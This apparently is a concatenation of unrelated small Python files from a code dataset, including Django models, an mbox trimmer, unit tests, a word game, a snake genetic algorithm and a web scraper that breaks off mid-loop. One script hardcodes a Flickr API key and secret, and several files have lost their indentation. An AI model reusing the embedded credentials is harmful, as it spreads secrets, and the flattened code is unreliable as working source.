from django.utils import timezone
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class RemoteProfile(models.Model):
host = models.URLField(max_length=200)
api_key = models.CharField(max_length=128)
def __str__(self):
return self.host
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField()
api_key = models.CharField(max_length=128, unique=True)
remote_profiles = models.ManyToManyField(RemoteProfile)
def __str__(self):
return self.user.__str__()
class Tag(models.Model):
name = models.CharField(max_length=128, blank=False, unique=True)
def __str__(self):
return self.name
class Post(models.Model):
slug = models.SlugField(max_length=200, unique=True)
title = models.CharField(max_length=256)
content = RichTextUploadingField(blank=True)
password = models.CharField(max_length=64, blank=True)
image = models.ImageField(upload_to='img/', default=None)
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
tags = models.ManyToManyField(Tag, blank=True)
published = models.BooleanField(default=False)
def __str__(self):
return self.title
class Page(models.Model):
slug = models.SlugField(max_length=200, unique=True)
order = models.IntegerField(default=0)
link_title = models.CharField(max_length=32)
content = RichTextUploadingField(blank=True)
published = models.BooleanField(default=False)
LOCATION_CHOICES = [
('NAV', 'Navbar'),
('SIDE', 'Sidebar'),
('FOOT', 'Footer'),
]
location = models.CharField(max_length=4, choices=LOCATION_CHOICES, default='NAV')
def __str__(self):
return self.link_title
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# $Id: mailtrim.py,v 1.1 2002/05/31 04:57:44 msoulier Exp $
"""The purpose of this script is to trim a standard Unix mbox file. If the
main function is called, it expects two parameters in argv. The first is the
number of most recent messages to keep. The second is the path to the mbox
file."""
import sys, os
from tempfile import mktemp
from shutil import copyfile
error = sys.stderr.write
def count_messages(file):
"""The purpose of this function is to count the messages in the mailbox,
rewind the mailbox seek pointer, and then return the number of messages in
the mailbox file."""
count = 0
    while True:
line = file.readline()
if not line: break
if line[:5] == "From ":
count = count + 1
file.seek(0)
return count
def trim(file, keep):
"""This purpose of this function is to perform the actual trimming of the
mailbox file."""
count = count_messages(file)
print "\nThere are %d messages in the mailbox file." % count
if count <= keep:
print "\nThis file already contains less than the desired number of"
print "messages. Nothing to do."
return
remove = count - keep
print "\nNeed to remove %d messages..." % remove
tempfilename = mktemp()
tempfile = open(tempfilename, "w")
copying = 0
    while True:
line = file.readline()
if not line: break
if line[:5] == "From ":
if remove:
remove = remove - 1
continue
else:
copying = 1
if not copying:
continue
tempfile.write(line)
tempfile.close()
copyfile(tempfilename, file.name)
os.unlink(tempfilename)
def main():
"""This function expects sys.argv to be set appropriately with the
required options, mentioned in the module's docstring. It is the entry
point for the rest of the program."""
if len(sys.argv) != 3:
error("Usage: %s <number to keep> <mbox file>\n" % sys.argv[0])
sys.exit(1)
    keep = int(sys.argv[1])
filename = sys.argv[2]
if not os.path.exists(filename):
error("ERROR: File %s does not exist\n" % filename)
sys.exit(1)
print "Trimming %s to %d messages..." % (filename, keep)
file = open(filename, "r")
trim(file, keep)
file.close()
print "\nDone trimming %s." % filename
if __name__ == '__main__': main()
|
nilq/baby-python
|
python
|
# 'hello_module.py'
def helloworld():
    print("Hello World!")
def goodbye():
    print("Good Bye Dear!")
|
nilq/baby-python
|
python
|
from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import OrderView, PayNotifyView, OrderQueryView
urlpatterns = [
url(r"^order/$", OrderView.as_view(), name="order"),
url(r"^notify/$", csrf_exempt(PayNotifyView.as_view()), name="notify"),
url(r"^orderquery/$", OrderQueryView.as_view(), name="orderquery"),
]
|
nilq/baby-python
|
python
|
import flickr_api
import win32api, win32con, win32gui
username = 'NASA Goddard Photo and Video'
flickr_api.set_keys(api_key='73ec08be7826d8b0a608151ce5faaf9d', api_secret='fbb2fcd772ce44a6')
user = flickr_api.Person.findByUserName(username)
photos = user.getPublicPhotos()
print(photos[0])
photos[0].save(photos[0].title+".jpg")
def setWallpaper(path):
key = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER,"Control Panel\\Desktop",0,win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(key, "WallpaperStyle", 0, win32con.REG_SZ, "0")
win32api.RegSetValueEx(key, "TileWallpaper", 0, win32con.REG_SZ, "0")
win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER, path, 1+2)
if __name__== "__main__":
path = r'C:\Users\djs04_000\documents\visual studio 2013\Projects\WallSpace\WallSpace\Hubble Observes One-of-a-Kind Star Nicknamed ?Nasty?.jpg'
setWallpaper(path)
|
nilq/baby-python
|
python
|
import math
from typing import Any
from error import Error
from dataclasses import dataclass
class Value:
def add(self, other):
self.illegal_operation()
def subtract(self, other):
self.illegal_operation()
def multiply(self, other):
self.illegal_operation()
def divide(self, other):
self.illegal_operation()
def mod(self, other):
self.illegal_operation()
def eq(self, other):
self.illegal_operation()
def ne(self, other):
self.illegal_operation()
def lt(self, other):
self.illegal_operation()
def gt(self, other):
self.illegal_operation()
def le(self, other):
self.illegal_operation()
def ge(self, other):
self.illegal_operation()
def and_(self, other):
self.illegal_operation()
def or_(self, other):
self.illegal_operation()
def xor(self, other):
self.illegal_operation()
def plus(self):
self.illegal_operation()
def minus(self):
self.illegal_operation()
def not_(self):
self.illegal_operation()
def invert(self):
self.illegal_operation()
def pound(self):
self.illegal_operation()
def illegal_operation(self):
raise Error('Illegal operation')
def __repr__(self):
return f'{self.value}'
@dataclass
class Number(Value):
value: float
def add(self, other):
if isinstance(other, Number):
return Number(self.value + other.value)
else:
self.illegal_operation()
def subtract(self, other):
if isinstance(other, Number):
return Number(self.value - other.value)
else:
self.illegal_operation()
def multiply(self, other):
if isinstance(other, Number):
return Number(self.value * other.value)
else:
self.illegal_operation()
def divide(self, other):
if isinstance(other, Number):
return Number(self.value / other.value)
else:
self.illegal_operation()
def mod(self, other):
if isinstance(other, Number):
return Number(self.value % other.value)
else:
self.illegal_operation()
def eq(self, other):
if isinstance(other, Number):
return Number(float(self.value == other.value))
else:
return Number(0.0)
def ne(self, other):
if isinstance(other, Number):
return Number(float(self.value != other.value))
else:
return Number(1.0)
def lt(self, other):
if isinstance(other, Number):
return Number(float(self.value < other.value))
else:
return self.illegal_operation()
def gt(self, other):
if isinstance(other, Number):
return Number(float(self.value > other.value))
else:
return self.illegal_operation()
def le(self, other):
if isinstance(other, Number):
return Number(float(self.value <= other.value))
else:
return self.illegal_operation()
def ge(self, other):
if isinstance(other, Number):
return Number(float(self.value >= other.value))
else:
return self.illegal_operation()
def and_(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) and bool(other.value)))
else:
return self.illegal_operation()
def or_(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) or bool(other.value)))
else:
return self.illegal_operation()
def xor(self, other):
if isinstance(other, Number):
return Number(float(bool(self.value) != bool(other.value)))
else:
return self.illegal_operation()
def plus(self):
return Number(+self.value)
def minus(self):
return Number(-self.value)
def not_(self):
return Number(float(not bool(self.value)))
def invert(self):
return Number(float(~math.floor(self.value)))
def __repr__(self):
return f'{self.value}'
@dataclass
class String(Value):
value: str
def add(self, other):
if isinstance(other, String):
return String(self.value + other.value)
else:
self.illegal_operation()
def eq(self, other):
if isinstance(other, String):
return Number(float(self.value == other.value))
else:
return Number(0.0)
def ne(self, other):
if isinstance(other, String):
return Number(float(self.value != other.value))
else:
return Number(1.0)
def pound(self):
return Number(float(len(self.value)))
def __repr__(self):
return f'{self.value}'
@dataclass
class At(Value):
def eq(self, other):
return Number(float(isinstance(other, At)))
def ne(self, other):
return Number(float(not isinstance(other, At)))
def __repr__(self):
return '@'
@dataclass
class Func(Value):
    func: Any
def __repr__(self):
return '<function>'
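
# Usage sketch (example values only):
if __name__ == '__main__':
    print(Number(2.0).add(Number(3.0)))    # 5.0
    print(String('ab').add(String('cd')))  # abcd
    print(Number(2.0).lt(Number(3.0)))     # 1.0 (i.e. true)
    print(String('abc').pound())           # 3.0 (length via the pound operator)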
|
nilq/baby-python
|
python
|
#
# Memento
# Backend
# Notification Models
#
from datetime import datetime
from sqlalchemy.orm import validates
from ..app import db
# defines a channel where notifications are sent
class Channel(db.Model):
# kinds/types
class Kind:
Task = "task"
Event = "event"
Notice = "notice"
# model fields
id = db.Column(db.Integer, primary_key=True)
kind = db.Column(db.String(64), nullable=False)
# relationships
user_id = db.Column(db.Integer, db.ForeignKey("user.id"), nullable=False)
notifications = db.relationship("Notification", backref=db.backref("channel"),
lazy=True)
@validates('kind')
def validate_kind(self, key, kind):
kind_list = [Channel.Kind.Task,
Channel.Kind.Event,
Channel.Kind.Notice]
if not kind:
raise AssertionError("kind must not be empty")
elif kind not in kind_list:
            raise AssertionError('kind must be one of "task", "event" or "notice"')
else:
return kind
# defines a notification that is send to a channel
class Notification(db.Model):
# model fields
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(256), nullable=False)
description = db.Column(db.String(1024), nullable=True)
firing_time = db.Column(db.DateTime, nullable=False) # utc timezone
# relationships
channel_id = db.Column(db.Integer, db.ForeignKey("channel.id"), nullable=True)
@validates('title')
    def validate_title(self, key, title):
if not title:
raise AssertionError('title must not be empty')
        elif len(title) < 2 or len(title) > 256:
            raise AssertionError('title must be between 2 and 256 characters long')
else:
return title
@validates('description')
    def validate_description(self, key, description):
        # the description column is nullable, so only check length when a value is given
        if description and len(description) > 1024:
raise AssertionError("Description must not exceed 1024 characters")
else:
return description
## convenience properties
# checks if the notification is pending firing
# returns True if pending firing False otherwise
@property
def pending(self):
time_till_fire = (self.firing_time - datetime.utcnow()).total_seconds()
# max secs after firing time for a notification to be considered still pending
pending_window = 60.0
        return time_till_fire > -pending_window
|
nilq/baby-python
|
python
|
import unittest
from unittest.mock import Mock
from pydictionaria import sfm_lib
from clldutils.sfm import SFM, Entry
def test_normalize():
from pydictionaria.sfm_lib import normalize
sfm = SFM([Entry([('sd', 'a__b')])])
sfm.visit(normalize)
assert sfm[0].get('sd') == 'a b'
def test_split_join():
from pydictionaria.sfm_lib import split, join
assert split(join(['a', 'b'])) == ['a', 'b']
def test_Entry():
from pydictionaria.sfm_lib import Entry
e = Entry.from_string("""
\\lx lexeme
\\hm 1
\\marker value
""")
assert e.id == 'lexeme 1'
e.upsert('marker', 'new value')
assert e.get('marker') == 'new value'
e.upsert('new_marker', 'value')
assert e.get('new_marker') == 'value'
def test_ComparisonMeanings(mocker):
from pydictionaria.sfm_lib import Entry, ComparisonMeanings
class Concepticon(object):
conceptsets = {1: mocker.Mock(id='1', gloss='gloss', definition='definition')}
def lookup(self, *args, **kw):
return [[(None, 1)]]
cm = ComparisonMeanings(Concepticon())
e = Entry([('lx', 'lexeme'), ('de', 'meaning')])
cm(e)
assert 'gloss' in e.get('zcom2')
e = Entry([('lx', 'lexeme'), ('ge', 'gl.oss')])
cm(e)
assert 'gloss' in e.get('zcom2')
class ExampleExtraction(unittest.TestCase):
def test_separate_examples_from_entry(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation'),
('dt', 'time stamp')])
new_entry = extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(new_entry, [
('lx', 'headword'),
('xref', example.id),
('dt', 'time stamp')])
def test_marker_mapping(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('tx', 'primary text'),
('ft', 'translation'),
('lemma', 'headword')])
def test_generation_of_lemma_marker(self):
# Side Question: Is it bad that the lemma marker is appended to the end?
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('tx', 'primary text'),
('ft', 'translation'),
('lemma', 'headword')])
def test_merging_of_lemma_marker(self):
example_markers = {'lemma', 'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('lemma', 'other_headword'),
('xv', 'primary text'),
('xe', 'translation')])
extractor(entry)
examples = list(extractor.examples.values())
example = examples[0]
self.assertEqual(example, [
('ref', example.id),
('lemma', 'other_headword ; headword'),
('tx', 'primary text'),
('ft', 'translation')])
def test_multiple_examples(self):
example_markers = {'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
def test_there_might_be_stuff_before_xv(self):
example_markers = {'rf', 'xv', 'xe'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('rf', 'source 2'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('rf', 'source 3'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 1'),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('rf', 'source 2'),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('rf', 'source 3'),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
def test_there_might_be_stuff_after_xe(self):
example_markers = {'xv', 'xe', 'z0'}
extractor = sfm_lib.ExampleExtractor(example_markers, {}, Mock())
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('z0', 'gloss ref 1'),
('xv', 'primary text 2'),
('xe', 'translation 2'),
('z0', 'gloss ref 2'),
('xv', 'primary text 3'),
('xe', 'translation 3'),
('z0', 'gloss ref 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('z0', 'gloss ref 1'),
('lemma', 'headword')])
example2 = examples[1]
self.assertEqual(example2, [
('ref', example2.id),
('tx', 'primary text 2'),
('ft', 'translation 2'),
('z0', 'gloss ref 2'),
('lemma', 'headword')])
example3 = examples[2]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('z0', 'gloss ref 3'),
('lemma', 'headword')])
def test_missing_xe(self):
example_markers = {'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', 'primary text 2'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
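        # assert_not_called() raising AssertionError here means log.write
        # *was* called, i.e. the extractor logged the malformed example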
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_xv_in_the_middle(self):
example_markers = {'xv', 'mid1', 'mid2', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('mid1', 'mid1 1'),
('xv', 'primary text 1b'),
('mid2', 'mid2 1'),
('xe', 'translation 1')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1 primary text 1b'),
('mid1', 'mid1 1'),
('mid2', 'mid2 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
def test_rf_in_the_middle(self):
example_markers = {'rf', 'xv', 'mid1', 'mid2', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('mid1', 'mid1 1'),
('rf', 'source 2'),
('xv', 'primary text 2'),
('mid2', 'mid2 2'),
('xe', 'translation 2')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 2'),
('tx', 'primary text 2'),
('mid2', 'mid2 2'),
('ft', 'translation 2'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_missing_xe_and_empty_xv(self):
example_markers = {'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('xv', ''),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_two_xv_markers_at_the_beginning(self):
example_markers = {'rf', 'xv', 'xe'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('rf', 'source 1'),
('xv', 'primary text 1'),
('xe', 'translation 1'),
('rf', 'source 2'),
('xe', 'translation 2'),
('rf', 'source 3'),
('xv', 'primary text 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('rf', 'source 1'),
('tx', 'primary text 1'),
('ft', 'translation 1'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('rf', 'source 3'),
('tx', 'primary text 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
def test_missing_beginning(self):
example_markers = {'rf', 'xv', 'xe', 'other_marker'}
log = Mock()
extractor = sfm_lib.ExampleExtractor(example_markers, {}, log)
entry = Entry([
('lx', 'headword'),
('xv', 'primary text 1'),
('other_marker', 'other marker 1'),
('xe', 'translation 1'),
('other_marker', 'other marker 2'),
('xe', 'translation 2'),
('xv', 'primary text 3'),
('other_marker', 'other marker 3'),
('xe', 'translation 3')])
extractor(entry)
examples = list(extractor.examples.values())
example1 = examples[0]
self.assertEqual(example1, [
('ref', example1.id),
('tx', 'primary text 1'),
('other_marker', 'other marker 1'),
('ft', 'translation 1'),
# Note: trailing stuff ends up in the previous example, because we
# never know, when an example *truly* ends
('other_marker', 'other marker 2'),
('lemma', 'headword')])
example3 = examples[1]
self.assertEqual(example3, [
('ref', example3.id),
('tx', 'primary text 3'),
('other_marker', 'other marker 3'),
('ft', 'translation 3'),
('lemma', 'headword')])
with self.assertRaises(AssertionError):
log.write.assert_not_called()
|
nilq/baby-python
|
python
|
# shuffle randomly shuffles a list, and choice picks one item from a sequence
from random import choice, shuffle
# the external module termcolor is used to generate colored output
from termcolor import colored, cprint
# the external module pyfiglet draws ASCII art very easily
import pyfiglet
# found_syn returns synonyms of the word the player enters [see synonym.py]
from synonym import found_syn
# colors available for termcolor
ava_colors = ("red", "blue", "green", "yellow", "magenta", "cyan")
# decorate() prints a string in a randomly chosen color
def decorate(text):
    cprint(colored(text, choice(ava_colors)))
# ascii_text() prints a string as colored ASCII art
def ascii_text(text):
    art = pyfiglet.figlet_format(text)
    decorate(art)  # print the ASCII art in color
# jumble() shuffles the letters of the given word
def jumble(word):
    # shuffle only works on lists, so turn the word into a list of letters
    jumble_word = list(word)
    # shuffle the list of letters
    shuffle(jumble_word)
    # join the letters back together with the built-in join method
    shuffle_word = ''.join(jumble_word)
    # if shuffling produced the same word, shuffle again; otherwise return it
    if word != shuffle_word:
        return shuffle_word
    else:
        return jumble(word)
# display a hint message --> written once to keep the code DRY [Don't Repeat Yourself!]
def give_hint(hintMsg, hint, word, join="with"):
    decorate(f"\n The word {hintMsg} {join} {hint}")
    answer = input().lower()
    # if the player guesses correctly after the hint, return True so the game
    # can print CORRECT and move on to the next player
    if answer == word:
        return True
# show up to 3 hints to the player
def get_hint(word):
    decorate("Hint ---> ")
    while True:
        # 1st hint shows only the first letter of the word
        if give_hint("starts", word[0], word):
            return True
        # 2nd hint shows only the last letter of the word
        elif give_hint("ends", word[-1], word):
            return True
        else:
            # 3rd hint shows one close meaning (synonym) of the word
            # found_syn() finds and returns synonyms [see synonym.py]
            synonym = found_syn(word)
            # if a synonym was found, show it to the player
            if synonym:
                if give_hint("synonyms", choice(synonym), word, "is"):
                    # the player guessed correctly after seeing the synonym
                    return True
            # otherwise the caller reveals the original answer to the player
            else:
                print()  # one blank line of spacing
                break
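
# Usage sketch (example word; requires the external termcolor and pyfiglet
# packages plus the local synonym module):
#   ascii_text("Jumble!")
#   shuffled = jumble("python")
#   print(shuffled)  # e.g. 'honpyt'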
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name='COERbuoyOne',
version='0.2.0',
author='Simon H. Thomas',
author_email='simon.thomas.2021@mumail.ie',
packages=['COERbuoyOne'],
url='http://coerbuoy.maynoothuniversity.ie',
license='LICENSE.txt',
    description='A realistic benchmark for Wave Energy Converter controllers',
long_description=open('README.txt').read(),
install_requires=[
"numpy",
"scipy",
"pandas",
"COERbuoy",
],
include_package_data=True,
)
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name='ShapeWorld',
version='0.1',
description='A new test methodology for multimodal language understanding',
author='Alexander Kuhnle',
author_email='aok25@cam.ac.uk',
keywords=[],
license='MIT',
url='https://github.com/AlexKuhnle/ShapeWorld',
packages=['shapeworld'],
install_requires=['numpy', 'pillow'])
|
nilq/baby-python
|
python
|
class Solution:
def validWordSquare(self, words):
"""
:type words: List[str]
:rtype: bool
"""
m = len(words)
if m != 0:
n = len(words[0])
else:
n = 0
if m != n:
return False
for x in range(m):
n = len(words[x])
c = 0
#print('x', x)
for y in range(m):
if len(words[y]) < x + 1:
break
c += 1
if c != n:
return False
for y in range(n):
if words[x][y] != words[y][x]:
return False
return True
"""
Given a sequence of words, check whether it forms a valid word square.
A sequence of words forms a valid word square if the kth row and column read the exact same string, where 0 ≤ k < max(numRows, numColumns).
Note:
The number of words given is at least 1 and does not exceed 500.
Word length will be at least 1 and does not exceed 500.
Each word contains only lowercase English alphabet a-z.
Example 1:
Input:
[
"abcd",
"bnrt",
"crmy",
"dtye"
]
Output:
true
"""
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
import torch
from models import *
device = "cuda:0" if torch.cuda.is_available() else "cpu"
def plot_random():
"""
Plots a random character from the Normal Distribution N[0,5).
No arguments
"""
# dec.eval()
samp=(torch.randn(1,8)*5).float().to(device)
plt.imshow(dec(samp).reshape(28,28).squeeze().detach().cpu().numpy())
return plt.show()
def plot_losses(recloss,dloss,gloss):
"""
Function which plots graph of all losses.
Args:
        recloss (list or iterable type object): Object containing recombination loss for each epoch/iteration.
dloss (list or iterable type object): Object containing discriminator loss.
gloss (list or iterable type object): Object containing generator loss.
"""
plt.plot(recloss,label='recombination loss')
plt.plot(dloss,label='discriminator loss')
plt.plot(gloss,label='gen loss')
plt.legend()
return plt.show()
def interpolate_characters(n,s1,s2,filename=None,cmap=None):
"""
Function which returns a plot of n-linearly interpolated figures between s1 and s2.
Args:
n (Integer): Number of plots you want.
s1 (torch.tensor): Image one.
s2 (torch.tensor): Image two.
filename (String): Name of image you want to store the plot as. Defaults to None.
cmap (String): Custom matplotlib cmap. Defaults to 'Greens'.
"""
f, axarr = plt.subplots(ncols=n)
# dec.eval()
if cmap is not None:
plt.set_cmap(cmap)
else:
plt.set_cmap('Greens')
plt.axis('off')
m=(s2-s1)/n
for i in range(n):
latz=m*(i+1)+s1
image=dec(latz).reshape(28,28).detach().cpu().numpy()
axarr[i].imshow(image)
axarr[i].axis("off")
if filename is not None:
plt.savefig(filename,bbox_inches='tight')
return plt.show()
|
nilq/baby-python
|
python
|
duration_seconds = int(input())
seconds = duration_seconds % 60
temp = duration_seconds // 60
minutes = temp % 60
temp = temp // 60
hours = temp  # hours in a duration are unbounded, so no modulo here
print(f"{hours}:{minutes:02d}:{seconds:02d}")
|
nilq/baby-python
|
python
|
import pickle
import os
import sys
import genetic_algorithm as ga
import game
import pygame
import numpy as np
import snake
def save(generation, details, filename="generation"):
"""
Saves a snakes generation after checking if a file with same name
already exists (also asks for a new name before exiting)
"""
if not isinstance(filename, str):
raise TypeError("Expected a string, received a " + type(filename).__name__)
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
if not isinstance(details, dict):
raise TypeError("Expected a dictionary, received a " + type(details).__name__)
# setting path filename and checking if it already exists
if not os.path.exists("models"):
os.mkdir('models')
path_filename = "models/" + filename
already_exists = os.path.isfile(path_filename)
if already_exists:
answer = get_yes_no("A file with this name already exists, do you want to overwrite it? [yes/no]")
if not answer:
filename = input("Please enter the new name: ")
save(generation, details, filename)
exit()
with open(path_filename, "wb") as f:
pickle.dump(generation, f)
pickle.dump(details, f)
print(filename + " is correctly saved!")
def load(filename="generation"):
"""
Loads a snakes generation
"""
if not isinstance(filename, str):
raise TypeError("Expected a string, received a " + type(filename).__name__)
# setting path filename and checking if it already exists
path_filename = "models/" + filename
exists = os.path.isfile(path_filename)
if exists:
with open(path_filename, "rb") as f:
generation = pickle.load(f)
details = pickle.load(f)
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
sn.is_alive = True
sn.length = 1
sn.occupied = []
sn.fitness = 0
return generation, details
else:
print("Error: file not found")
exit()
def get_yes_no(question):
"""
Used to get a yes or no answer
"""
if not isinstance(question, str):
raise TypeError("Expected a string, received a " + type(question).__name__)
yes = {"yes", "y", "ye"}
no = {"no", "n"}
while True:
print(question)
answer = input().lower()
if answer in no:
return False
elif answer in yes:
return True
else:
print("Please respond with yes or no!")
def train(generation=[], details={}, snakes=10, shape=[], generations=1,
size=10, view=False, end=100):
"""
Used to train the model
"""
if not isinstance(generation, list):
raise TypeError("Expected a list, received a " + type(generation).__name__)
if not isinstance(details, dict):
raise TypeError("Expected a dict, received a " + type(details).__name__)
if not isinstance(snakes, int):
raise TypeError("Expected an int, received a " + type(snakes).__name__)
if not isinstance(shape, list):
raise TypeError("Expected a string, received a " + type(shape).__name__)
if not isinstance(generations, int):
raise TypeError("Expected an int, received a " + type(generations).__name__)
if not isinstance(size, int):
raise TypeError("Expected an int, received a " + type(size).__name__)
if not isinstance(view, bool):
raise TypeError("Expected a bool, received a " + type(view).__name__)
if not isinstance(end, int):
raise TypeError("Expected an int, received a " + type(end).__name__)
# initializing best results
best_generation = []
best_result = -1
best_index = 0
if not generation:
generation = ga.create_generation(generation, snakes, shape)
else:
for sn in generation:
if not isinstance(sn, snake.snake):
raise TypeError("Expected a snake, received a " + type(sn).__name__)
snakes = len(generation)
size = details["game_size"]
end = details["duration"]
# running the train simulation
for gen in range(generations):
generation = ga.create_generation(generation)
for sn in generation:
g = game.game(size, view, end)
g.add_snake(sn)
while g.snake.is_alive:
g.play()
if view: esc_exit()
result = np.mean([x.fitness for x in generation])
print("generation", gen+1, "/", generations, ":", result)
# updating best results
if result >= best_result:
best_generation = generation
best_result = result
best_index = gen
print("Saving generation", best_index+1, "with a result of", best_result, "...")
best_generation = ga.sort_generation(best_generation)
if not bool(details):
details = {"trained": generations,
"game_size": size,
"duration": end,
"best": best_generation[0].fitness}
else:
details["trained"] += generations
return best_generation, details
def esc_exit():
"""
Used to stop graphical representation
"""
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE: quit()
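# A hypothetical driver for the helpers above; the network shape and the
# counts below are illustrative assumptions, not values from this project.
if __name__ == "__main__":
    gen, details = train(snakes=20, shape=[24, 16, 4], generations=50, size=10)
    save(gen, details, filename="generation")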
|
nilq/baby-python
|
python
|
from bs4 import BeautifulSoup
from urllib.request import urlopen, Request
from time import gmtime, strftime
# Get the data from the source
url = "https://www.house.gov/representatives"
url_req = urlopen(Request(url, headers={'User-Agent': 'Mozilla'}))
raw_html = BeautifulSoup(url_req, "lxml")
html = raw_html.prettify()
# Archive data
dir_path = "archive/house/"
time_stamp = strftime("%Y-%m-%dT%H:%M:%S", gmtime())
# Archive HTML with a timestamp
file_name = dir_path + "html/house-" + time_stamp + ".html"
with open(file_name, "w") as html_file:
    html_file.write(str(html))
# Archive JSON with a timestamp
json_file_name = dir_path + "json/house-" + time_stamp + ".json"
json = open(json_file_name, "w")
json.write("{\n\t\"members\": [\n")
all_representatives = []
representatives = raw_html("tr")
for representative in representatives[498:]:
information = representative("td")
if len(information) > 0:
